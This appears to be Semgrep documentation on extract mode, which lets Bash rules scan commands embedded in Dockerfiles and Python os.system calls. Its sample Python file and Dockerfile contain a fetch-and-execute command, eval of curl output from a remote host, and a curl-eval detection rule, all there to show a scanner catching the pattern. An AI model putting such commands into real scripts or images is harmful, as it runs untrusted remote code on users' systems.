Example of extract mode
Without extract mode, writing rules to validate template, Markdown, or configuration files that contain code in another language can be burdensome and can require significant rule duplication.
Let's take the following Bash rule as an example (a simplified version of the `curl-eval` rule from the Semgrep Registry):
- id: curl-eval
message: Evaluating data from a `curl` command is unsafe.
- pattern: |
- pattern: |
- pattern: eval ...
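A complete rule along these lines might look like the following sketch. The `severity` and `languages` values, the use of taint mode, and the two source patterns are assumptions filled in for illustration; they are not necessarily the exact contents of the Registry rule.

```yaml
rules:
  - id: curl-eval
    severity: WARNING        # assumed severity
    languages:
      - bash
    message: Evaluating data from a `curl` command is unsafe.
    mode: taint              # assumed: sources flow into sinks
    pattern-sources:
      # Assumed sources: both forms of command substitution around curl
      - pattern: |
          $(curl ...)
      - pattern: |
          `curl ...`
    pattern-sinks:
      # Any eval of tainted data is reported
      - pattern: eval ...
```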
Usually, Semgrep runs this rule only against Bash files. However, a project might contain Dockerfiles or Python scripts that invoke Bash commands. Without an extract mode rule, Semgrep does not run any Bash rules against commands embedded in files of other languages.
With extract mode, you can tell Semgrep how to extract any Bash commands used in a Docker `RUN` instruction or passed as an argument to Python's `os.system` standard library function.
- id: extract-docker-run-to-bash
pattern: RUN $...CMD
- id: extract-python-os-system-to-bash
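Written out in full, the two extract rules might look like the sketch below. It uses the `extract` and `dest-language` keys described in the schema section; the `mode: extract` and `languages` entries, and in particular the Python pattern `os.system("$CMD")`, are assumptions made for illustration.

```yaml
rules:
  - id: extract-docker-run-to-bash
    mode: extract            # assumed key that marks this as an extract rule
    languages:
      - dockerfile
    pattern: RUN $...CMD
    extract: $...CMD         # the metavariable whose bound text is extracted
    dest-language: bash      # Bash rules then run on the extracted text
  - id: extract-python-os-system-to-bash
    mode: extract
    languages:
      - python
    pattern: os.system("$CMD")   # assumed pattern: binds the string contents
    extract: $CMD
    dest-language: bash
```

Each rule only says where the embedded Bash lives. The Bash rules themselves stay unchanged and do not need to be duplicated per host language.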
With the extract mode rules shown in the previous code snippet, Semgrep matches Bash code contained in the following Python file and reports the contained Bash as matching the `curl-eval` rule:
from os import system

if system('eval `curl -s "http://www.very-secure-website.net"`'):
    print("Command failed!")  # os.system returns a nonzero status on failure
Likewise, if the scanned files include a Dockerfile with an equivalent Bash command, Semgrep reports the contained Bash as matching the `curl-eval` rule. The following Dockerfile contains such a command:
RUN dnf install -y unzip zip curl which
RUN eval `curl -s "http://www.very-secure-website.net"`
Extract mode rule schema
Extract mode rules require the following usual Semgrep rule keys:
- One of
Extract mode rules also require two additional fields:
- `extract`
- `dest-language`
Extract mode has one optional field:
- `reduce`
The fields specific to extract mode are further explained in the sections below.
The `extract` key is required in extract mode. The value must be a metavariable appearing in your pattern(s). Semgrep uses the code bound to the metavariable for subsequent queries of non-extract mode rules targeting the language given by `dest-language`.
The `dest-language` key is required in extract mode. The value must be a language tag, such as `bash`.
The `reduce` key is optional in extract mode. The value of this key specifies a method to combine the ranges extracted by a single rule within a file.
The value of the `reduce` key must be one of the following:
- `separate`: Treat all matched ranges as separate units for subsequent queries. This is the default value.
- `concat`: Concatenate all matched ranges together and treat this result as a single unit for subsequent queries.
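As an illustration of the optional key, the sketch below is a variant of the Dockerfile extract rule that sets `reduce: concat`, so that all `RUN` commands in one Dockerfile are combined and queried as a single unit of Bash rather than one command at a time. The rule id is hypothetical, and the `mode: extract` and `languages` entries are assumed as in any extract rule.

```yaml
rules:
  - id: extract-docker-run-to-bash-concat   # hypothetical rule id
    mode: extract
    languages:
      - dockerfile
    pattern: RUN $...CMD
    extract: $...CMD
    dest-language: bash
    reduce: concat    # omit this key (or use separate) to query each match alone
```

Combining ranges can help when a Bash rule needs to see several commands together, for example a variable set in one `RUN` instruction and used in a later one.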
Limitations of extract mode
Currently, extract mode does not support additional processing for the extracted text, such as unescaping strings, which might be useful for some applications like Jupyter Notebooks.
While extract mode can help enable rules that try to track taint across a language boundary within a file, taint rules cannot have a source and a sink split across the original file and the extracted text.